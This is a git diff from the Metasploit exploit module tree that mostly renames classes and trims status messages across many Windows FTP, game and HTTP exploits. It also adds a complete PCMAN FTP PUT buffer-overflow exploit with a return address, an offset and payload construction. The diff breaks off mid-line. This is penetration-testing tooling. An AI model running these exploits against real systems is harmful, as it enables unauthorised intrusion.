b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 5adb8fc2fb..4afa3776fd 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb index 2799facccc..bf75081bac 100644 --- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb +++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index a27b61a9ed..824d7e0e35 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index b1b03bb545..a0be93b3b8 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 9345aca081..a9cf6d302a 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index e1404937dd..df8a083f4a 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 5d672e54ec..afe59385b0 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 75d677b645..92f731b177 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) if not conn fail_with(Failure::Unreachable, "#{@peer} - Connection failed") end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -115,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd(['STOR', filename], false, conn) - print_good("#{peer} - Upload successful") + print_good("Upload successful") disconnect(conn) end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 6bd6afcda3..592bad109b 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 99b39220b0..aa1c8cb6d8 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb new file mode 100644 index 0000000000..0379c0c577 --- /dev/null +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in the PUT command of the + PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous + credientials are enabled. + }, + 'Author' => + [ + 'Jay Turla', # Initial Discovery -- @shipcod3 + 'Chris Higgins' # msf Module -- @ch1gg1ns + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '37731'], + [ 'OSVDB', '94624'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0A\x0D", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 English', + { + 'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll + 'Offset' => 2007 + } + ], + ], + 'DisclosureDate' => 'Aug 07 2015', + 'DefaultTarget' => 0)) + end + + def check + connect_login + disconnect + + if /220 PCMan's FTP Server 2\.0/ === banner + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + + def exploit + connect_login + + print_status('Generating payload...') + sploit = rand_text_alpha(target['Offset']) + sploit << [target.ret].pack('V') + sploit << make_nops(16) + sploit << payload.encoded + + send_cmd( ["PUT", sploit], false ) + disconnect + end + +end diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index 10ea810e86..9ec9e76e93 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 91cf132b9e..c5565db2f1 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index a051ee3057..343134c41c 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") # We can't use connect_login, because it cannot determine a successful login correctly. # For example: The server actually returns a 503 (Bad Sequence of Commands) when the @@ -106,18 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote res = send_user(datastore['FTPUSER'], conn) if res !~ /^(331|2)/ - vprint_error("#{peer} - The server rejected our username: #{res.to_s}") + vprint_error("The server rejected our username: #{res.to_s}") return false end res = send_pass(datastore['FTPPASS'], conn) if res !~ /^(2|503)/ - vprint_error("#{peer} - The server rejected our password: #{res.to_s}") + vprint_error("The server rejected our password: #{res.to_s}") return false end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 2977243b78..0d36500d61 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index c07761fbd2..ffc7d788f1 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 48bdbf0d8a..6f204555fd 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 0499103f04..42d0bf5062 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 0c8492f50e..13c7fdf422 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Payload' => { diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index eaf8b779f9..a3bfa6be94 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 3439995d2c..6d5bcdc0ca 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 75c3f1fa63..eb547b3b9a 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index dca878528b..5be79c2078 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index de59a26cc6..0ed324112a 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 92ff75127d..57a026c205 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index b587adc4f6..18fc0971bb 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 1b8205a688..7c797946c4 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 3dbe048b51..4337793eac 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 1542008c2b..109c13a220 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index 5b80f89d7f..e333456c17 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] @session_cookie = authenticate(username, password) - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~1500 execute_cmdstager(flavor: :vbs, linemax: 1500) end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(username, password) - print_status("#{peer} - Authenticating") + print_status("Authenticating") res = send_request_cgi( 'uri' => '/admin_loginok.html', 'method' => 'POST', diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index d5bcefe4af..4ecd12e46f 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index aef6f65f7d..e73dc1f1e4 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index e4a300eca7..56db38b8d8 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 3ae6ee1c56..fac246c6f9 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 3b3d16a5ae..89ce3fd299 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 406afdf4dc..6589171d8d 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index e5dc86d847..5a4354bc73 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index c586e98158..e0349a6926 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 0d3a53e3de..a4f19815f1 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 88bd797a13..330a09117d 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] } diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 7336b28f7b..62df0874e3 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 074f885b40..dc3171e2d5 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 4f305e2f1a..99a7f4e393 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 689f107920..d2f50d14d3 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 3569fe8827..add74bc934 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ac211221c8..690467f2e8 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Removing #{@payload_path}") + print_warning("Removing #{@payload_path}") cli.fs.file.rm(@payload_path) - print_good("#{peer} - #{@payload_path} deleted") + print_good("#{@payload_path} deleted") rescue ::Exception => e print_error("Unable to delete #{@payload_path}: #{e.message}") end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" - print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") + print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -137,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = "" @payload_path = "" if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ - print_good("#{peer} - Payload uploaded successfuly") + print_good("Payload uploaded successfuly") else - print_error("#{peer} - Payload upload failed") + print_error("Payload upload failed") return end @@ -147,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ @payload_path = $1 - print_status("#{peer} - Payload stored on #{@payload_path}") + print_status("Payload stored on #{@payload_path}") else - print_error("#{peer} - The payload file path couldn't be retrieved") + print_error("The payload file path couldn't be retrieved") end if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ payload_url = URI($1).path else - print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!") + print_error("The payload URI couldn't be retrieved... Aborting!") return end @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing #{payload_url}...") + print_status("Executing #{payload_url}...") res = send_request_cgi({ 'uri' => payload_url, @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (!res or (res and res.code != 200)) - print_error("#{peer} - Execution failed on #{payload_url} [No Response]") + print_error("Execution failed on #{payload_url} [No Response]") return end diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb 